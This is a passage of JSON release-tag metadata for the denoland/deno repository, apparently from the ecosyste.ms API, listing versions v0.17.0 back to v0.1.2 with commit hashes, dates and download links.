o/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/ta